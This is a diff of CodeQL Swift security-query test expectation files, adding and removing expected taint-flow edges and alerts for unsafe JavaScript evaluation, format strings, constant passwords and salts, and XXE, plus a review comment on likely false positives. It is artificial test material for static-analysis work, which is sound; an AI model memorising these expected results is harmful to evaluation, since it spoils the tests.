| | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:269:22:269:124 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:in:) | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. 
| | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:277:26:277:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:277:26:277:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:280:26:280:26 | string | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:280:26:280:26 | string | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. 
| | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:291:17:291:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:291:17:291:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:204:12:204:66 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:205:12:205:35 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:208:30:208:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | | UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. | +| UnsafeJsEval.swift:305:17:305:17 | jsstr | UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:305:17:305:17 | jsstr | Evaluation of uncontrolled JavaScript from a remote source. 
| | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:318:24:318:87 | call to String.init(contentsOf:) | UnsafeJsEval.swift:320:44:320:74 | ... .+(_:_:) ... | Evaluation of uncontrolled JavaScript from a remote source. | diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected index 94dd27a82c2..43a8b08c7ea 100644 --- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected +++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected @@ -18,6 +18,8 @@ edges | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | provenance | | +| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:120:26:120:26 | tainted | provenance | | +| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:124:27:124:27 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:37:135:37 | tainted | provenance | | | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:139:5:139:5 | tainted | provenance | | 
@@ -28,6 +30,14 @@ edges | UncontrolledFormatString.swift:111:50:111:50 | tainted | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:112:64:112:64 | tainted | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:77:12:77:22 | format | provenance | | +| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | provenance | | +| UncontrolledFormatString.swift:120:26:120:26 | tainted | UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | provenance | | +| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | provenance | | +| UncontrolledFormatString.swift:124:27:124:27 | tainted | UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | provenance | | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | provenance | | +| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | provenance | | +| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | provenance | | | UncontrolledFormatString.swift:135:37:135:37 | tainted | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | provenance | | | UncontrolledFormatString.swift:139:5:139:5 | tainted | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | provenance | 
| | UncontrolledFormatString.swift:140:9:140:9 | cstr [Collection element] | UncontrolledFormatString.swift:141:24:141:24 | cstr | provenance | | @@ -60,6 +70,15 @@ nodes | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:116:11:116:11 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:118:61:118:61 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:120:22:120:33 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| UncontrolledFormatString.swift:120:26:120:26 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | semmle.label | taintedSan | +| UncontrolledFormatString.swift:124:23:124:34 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | +| UncontrolledFormatString.swift:124:27:124:27 | tainted | semmle.label | tainted | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| UncontrolledFormatString.swift:125:23:125:41 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | +| UncontrolledFormatString.swift:125:30:125:30 | taintedVal2 | semmle.label | taintedVal2 | +| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | semmle.label | taintedSan2 | | UncontrolledFormatString.swift:130:39:130:39 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | semmle.label | call to NSString.init(string:) | | UncontrolledFormatString.swift:135:37:135:37 | tainted | semmle.label | tainted | 
@@ -88,6 +107,8 @@ subpaths | UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:122:24:122:24 | taintedSan | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:122:24:122:24 | taintedSan | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:126:24:126:24 | taintedSan2 | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | | UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected index 0c1e98bfe7c..640286de0ca 100644 --- a/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected +++ b/swift/ql/test/query-tests/Security/CWE-259/ConstantPassword.expected 
@@ -1,4 +1,17 @@ edges +| rncryptor.swift:60:9:60:65 | call to String.init(_:) | rncryptor.swift:68:25:68:44 | call to getARandomPassword() | provenance | | +| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | provenance | | +| rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:60:16:60:64 | call to map(_:) | provenance | | +| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) | provenance | | +| rncryptor.swift:60:16:60:64 | call to map(_:) | rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:74:89:74:89 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:75:56:75:56 | myRandomPassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | rncryptor.swift:81:56:81:56 | myMaybePassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | 
myConstPassword | provenance | | | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | provenance | | @@ -30,7 +43,15 @@ edges | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:63:40:63:40 | constantStringPassword | provenance | | | test.swift:44:31:44:48 | call to getConstantArray() [Collection element] | test.swift:68:34:68:34 | constantStringPassword | provenance | | nodes +| rncryptor.swift:60:9:60:65 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| rncryptor.swift:60:9:60:65 | call to String.init(_:) [Collection element] | semmle.label | call to String.init(_:) [Collection element] | +| rncryptor.swift:60:16:60:16 | ............ | semmle.label | ............ | +| rncryptor.swift:60:16:60:64 | call to map(_:) | semmle.label | call to map(_:) | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() | semmle.label | call to getARandomPassword() | +| rncryptor.swift:68:25:68:44 | call to getARandomPassword() [Collection element] | semmle.label | call to getARandomPassword() [Collection element] | | rncryptor.swift:69:24:69:24 | abc123 | semmle.label | abc123 | +| rncryptor.swift:74:89:74:89 | myRandomPassword | semmle.label | myRandomPassword | +| rncryptor.swift:75:56:75:56 | myRandomPassword | semmle.label | myRandomPassword | | rncryptor.swift:77:89:77:89 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:78:56:78:56 | myConstPassword | semmle.label | myConstPassword | | rncryptor.swift:80:89:80:89 | myMaybePassword | semmle.label | myMaybePassword | 
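Review bot: The added edges make the string literal at rncryptor.swift:60:16 (`............`) a constant-password source for `getARandomPassword()`, and the `#select` hunk of this file then reports `myRandomPassword` (lines 74, 75) and adds a second alert on `myMaybePassword` (lines 80, 81). The path is literal, then `map(_:)`, then `String.init(_:)`, so the literal is presumably only a length template whose characters the closure replaces; the closure body is not visible, so that is an assumption. The ConstantSalt.expected hunks add the same path for `getARandomString()` from rncryptor.swift:47:16 into `myRandomSalt1` and `myRandomSalt2`. If these results are spurious, annotate the rncryptor.swift call sites as known false positives, e.g. `// GOOD [FALSE POSITIVE]`, so the baseline does not read as intended behaviour for the hard-coded credential queries.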
@@ -65,9 +86,13 @@ nodes | test.swift:68:34:68:34 | constantStringPassword | semmle.label | constantStringPassword | subpaths #select +| rncryptor.swift:74:89:74:89 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:74:89:74:89 | myRandomPassword | The value '............' is used as a constant password. | +| rncryptor.swift:75:56:75:56 | myRandomPassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:75:56:75:56 | myRandomPassword | The value '............' is used as a constant password. | | rncryptor.swift:77:89:77:89 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:77:89:77:89 | myConstPassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:78:56:78:56 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:78:56:78:56 | myConstPassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:80:89:80:89 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:80:89:80:89 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:80:89:80:89 | myMaybePassword | The value 'abc123' is used as a constant password. | +| rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:60:16:60:16 | ............ | rncryptor.swift:81:56:81:56 | myMaybePassword | The value '............' is used as a constant password. | | rncryptor.swift:81:56:81:56 | myMaybePassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:81:56:81:56 | myMaybePassword | The value 'abc123' is used as a constant password. | | rncryptor.swift:91:39:91:39 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:91:39:91:39 | myConstPassword | The value 'abc123' is used as a constant password. 
| | rncryptor.swift:92:37:92:37 | myConstPassword | rncryptor.swift:69:24:69:24 | abc123 | rncryptor.swift:92:37:92:37 | myConstPassword | The value 'abc123' is used as a constant password. | diff --git a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected index 213ece4f9ad..8ec8033d086 100644 --- a/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected +++ b/swift/ql/test/query-tests/Security/CWE-611/XXETest.expected @@ -1,18 +1,2 @@ testFailures -| testLibxmlXXE.swift:101:78:102:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:102:80:103:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:103:107:104:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:104:82:105:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:106:78:107:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:107:80:108:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:109:87:110:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:110:89:111:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:112:99:113:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:113:97:114:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:115:87:116:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:116:89:117:1 | // $ hasXXE=95\n | Missing result: hasXXE=95 | -| testLibxmlXXE.swift:118:89:119:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:119:91:120:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:121:98:122:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | -| testLibxmlXXE.swift:122:100:123:1 | // $ hasXXE=96\n | Missing result: hasXXE=96 | failures 
diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index 002454a3021..93d06372be4 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected 
@@ -1,4 +1,28 @@ edges +| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:57:27:57:44 | call to getARandomString() | provenance | | +| rncryptor.swift:47:9:47:69 | call to String.init(_:) | rncryptor.swift:58:27:58:44 | call to getARandomString() | provenance | | +| rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:47:16:47:68 | call to map(_:) | provenance | | +| rncryptor.swift:47:16:47:68 | call to map(_:) | rncryptor.swift:47:9:47:69 | call to String.init(_:) | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:62:57:62:57 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:67:106:67:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:69:106:69:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:70:106:70:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:72:106:72:106 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:74:127:74:127 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:76:127:76:127 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:77:135:77:135 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | rncryptor.swift:79:135:79:135 | myRandomSalt1 | provenance | | +| rncryptor.swift:57:27:57:44 | call to getARandomString() | rncryptor.swift:57:22:57:45 | call to Data.init(_:) | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:64:55:64:55 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:67:131:67:131 | myRandomSalt2 | provenance | | +| 
rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:68:133:68:133 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:70:131:70:131 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:71:133:71:133 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:74:152:74:152 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:75:154:75:154 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:77:160:77:160 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | rncryptor.swift:78:162:78:162 | myRandomSalt2 | provenance | | +| rncryptor.swift:58:27:58:44 | call to getARandomString() | rncryptor.swift:58:22:58:45 | call to Data.init(_:) | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:71:106:71:106 | myConstantSalt1 | provenance | | 
@@ -24,19 +48,44 @@ edges | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:63:59:63:59 | constantStringSalt | provenance | | | test.swift:44:27:44:44 | call to getConstantArray() [Collection element] | test.swift:68:53:68:53 | constantStringSalt | provenance | | nodes +| rncryptor.swift:47:9:47:69 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| rncryptor.swift:47:16:47:16 | ................ | semmle.label | ................ | +| rncryptor.swift:47:16:47:68 | call to map(_:) | semmle.label | call to map(_:) | +| rncryptor.swift:57:22:57:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | +| rncryptor.swift:57:27:57:44 | call to getARandomString() | semmle.label | call to getARandomString() | +| rncryptor.swift:58:22:58:45 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | +| rncryptor.swift:58:27:58:44 | call to getARandomString() | semmle.label | call to getARandomString() | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:59:29:59:29 | abcdef123456 | semmle.label | abcdef123456 | | rncryptor.swift:60:24:60:30 | call to Data.init(_:) | semmle.label | call to Data.init(_:) | | rncryptor.swift:60:29:60:29 | 0 | semmle.label | 0 | +| rncryptor.swift:62:57:62:57 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:64:55:64:55 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:67:106:67:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:67:131:67:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:68:106:68:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:68:133:68:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:69:106:69:106 | 
myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:69:131:69:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:70:106:70:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:70:131:70:131 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:71:133:71:133 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:72:106:72:106 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:74:127:74:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:74:152:74:152 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:75:154:75:154 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:76:127:76:127 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | semmle.label | myConstantSalt2 | +| rncryptor.swift:77:135:77:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | +| rncryptor.swift:77:160:77:160 | myRandomSalt2 | semmle.label | myRandomSalt2 | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | semmle.label | myConstantSalt1 | +| rncryptor.swift:78:162:78:162 | myRandomSalt2 | semmle.label | myRandomSalt2 | +| rncryptor.swift:79:135:79:135 | myRandomSalt1 | semmle.label | myRandomSalt1 | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | semmle.label | myConstantSalt2 | | test.swift:29:3:29:3 | this string is constant | semmle.label | this string is constant | | test.swift:33:2:33:34 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | 
